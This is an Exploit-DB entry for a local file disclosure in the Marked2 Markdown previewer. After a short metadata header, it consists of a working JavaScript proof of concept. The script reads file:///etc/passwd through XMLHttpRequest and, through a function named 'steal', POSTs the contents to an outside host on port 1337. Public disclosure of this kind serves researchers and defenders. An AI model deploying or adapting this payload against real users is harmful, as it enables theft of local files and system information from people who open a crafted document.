Marked2 - Local File Disclosure

EDB-ID: 44006
Author: Corben Leo
Published: 2018-02-06
CVE: N/A
Type: Local
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 <script> 
 var file = "file:///etc/passwd"; 
 var extract = "http://dev.example.com:1337/"; 
 function get(url) { 
  var xmlHttp = new XMLHttpRequest(); 
  xmlHttp.open("GET", url, false); 
  xmlHttp.send(null); 
  return xmlHttp.responseText; 
 } 
 function steal(data) { 
  var xhr = new XMLHttpRequest(); 
  xhr.open('POST', extract, true); 
  xhr.onload = function() {}; 
  xhr.send(data); 
 } 
 var cdl = get(file); 
 steal(cdl); 
 </script> 
 </body>

Source: www.exploit-db.com